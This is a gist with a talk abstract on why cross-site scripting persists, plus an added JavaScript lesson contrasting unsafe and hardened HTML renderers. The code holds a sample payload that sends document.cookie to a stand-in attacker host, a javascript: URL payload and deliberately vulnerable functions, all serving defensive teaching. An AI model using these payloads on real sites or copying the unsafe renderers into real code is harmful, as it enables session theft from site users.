@al-the-x
Last active May 24, 2018 13:33
Abstract for "You XSS Your Life! -- How do we keep failing at security on the web?" for submission to HelpMeAbstract.com

You XSS Your Life! -- How do we keep failing at security on the web?

The Open Web Application Security Project (OWASP) has published a Top Ten list of web application security risks every few years since 2003. One specific vulnerability has appeared on every edition of that list: Cross-Site Scripting (XSS), the injection of attacker-controlled script or markup into a page so that it runs in other users' browsers. JavaScript is quickly becoming the most popular (or at least the most used) programming language in the world; more developers and tools join the ecosystem every day.

Despite over 10 years of awareness built through highly visible exploits and education through the OWASP Top Ten, despite thousands of new and experienced developers entering the JavaScript field over that decade, and despite fancy new tools and frameworks meant to protect us from XSS, how is XSS still on the list at all?

In this presentation, I'll break down how XSS works in theory and in practice, explain what the OWASP Top Ten is and why it matters, tell some stories about notable exploits from the last 10 years, and demonstrate some lesser-known vulnerabilities in client-side rendering libraries like Angular, Vue, and even React that bite developers practically every day.
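As an added illustration of the "theory and practice" the abstract promises (this is example code written for this page, not code from the gist or its author, and none of the function names, the `placeholder.invalid` base origin, or the attacker payloads come from the original), the block below renders two sinks the way a small template layer would: an HTML text node and a URL attribute. Each is shown unsafe and then hardened. The URL case is included because it is the kind of gap that survives even in frameworks that escape text for you: escaping is necessary but not sufficient, since `javascript:alert(1)` contains no HTML metacharacters at all. It runs under Node with no DOM; the "page" is just the string each renderer returns.

```javascript
// Added example (not code from the gist or its author): two XSS sinks a
// rendering layer hits constantly, shown unsafe and then hardened.
// Runs under Node with no DOM; the "page" is just the HTML string returned.

// Escape the five characters that change meaning in HTML text and
// double-quoted attribute values. This is the whole fix for the text sink.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Sink 1, vulnerable: untrusted input concatenated straight into markup.
// Anything the attacker puts in `name` becomes part of the document.
function renderGreetingUnsafe(name) {
  return '<p>Hello, ' + name + '!</p>';
}

// Sink 1, hardened: the value is escaped for the HTML text context.
function renderGreetingSafe(name) {
  return '<p>Hello, ' + escapeHtml(name) + '!</p>';
}

// Sink 2: a URL attribute. Escaping alone does not help, because
// `javascript:alert(1)` contains no HTML metacharacters. The hardened
// version allows only http(s) and relative URLs (the scheme allow-list is
// an assumption for this example; extend it for mailto: etc. if needed).
function safeHref(url) {
  let parsed;
  try {
    // Relative URLs resolve against a placeholder origin (assumed for the
    // example); absolute URLs keep their own scheme, which is what we check.
    parsed = new URL(url, 'https://placeholder.invalid/');
  } catch (e) {
    return '#';
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
    return '#';
  }
  return escapeHtml(url);
}

function renderLinkUnsafe(url) {
  // Escaped, yet still exploitable: a javascript: URL passes through untouched.
  return '<a href="' + escapeHtml(url) + '">profile</a>';
}

function renderLinkSafe(url) {
  return '<a href="' + safeHref(url) + '">profile</a>';
}

// Constructed attacker inputs for the demo (not taken from any real incident).
const SCRIPT_PAYLOAD = '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>';
const JS_URL_PAYLOAD = 'javascript:alert(document.domain)';

// Crude detector used only to make the demo's result explicit:
// does the rendered markup contain an executable script context?
function hasExecutableContext(html) {
  return /<script\b/i.test(html) || /href="javascript:/i.test(html);
}

// Renders each payload through the unsafe and hardened versions and reports
// which outputs still carry an executable context.
function demo() {
  const results = {
    greetingUnsafe: hasExecutableContext(renderGreetingUnsafe(SCRIPT_PAYLOAD)),
    greetingSafe: hasExecutableContext(renderGreetingSafe(SCRIPT_PAYLOAD)),
    linkUnsafe: hasExecutableContext(renderLinkUnsafe(JS_URL_PAYLOAD)),
    linkSafe: hasExecutableContext(renderLinkSafe(JS_URL_PAYLOAD)),
  };
  console.log(results);
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  demo();
}
```

Running it prints `greetingUnsafe: true` and `linkUnsafe: true` beside `greetingSafe: false` and `linkSafe: false`. The point of the second pair is the one that bites framework users: an output layer that escapes every interpolated string is still one `href` away from script execution unless the scheme is validated too.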

@al-the-x (Author): Comments managed via https://giscus.co
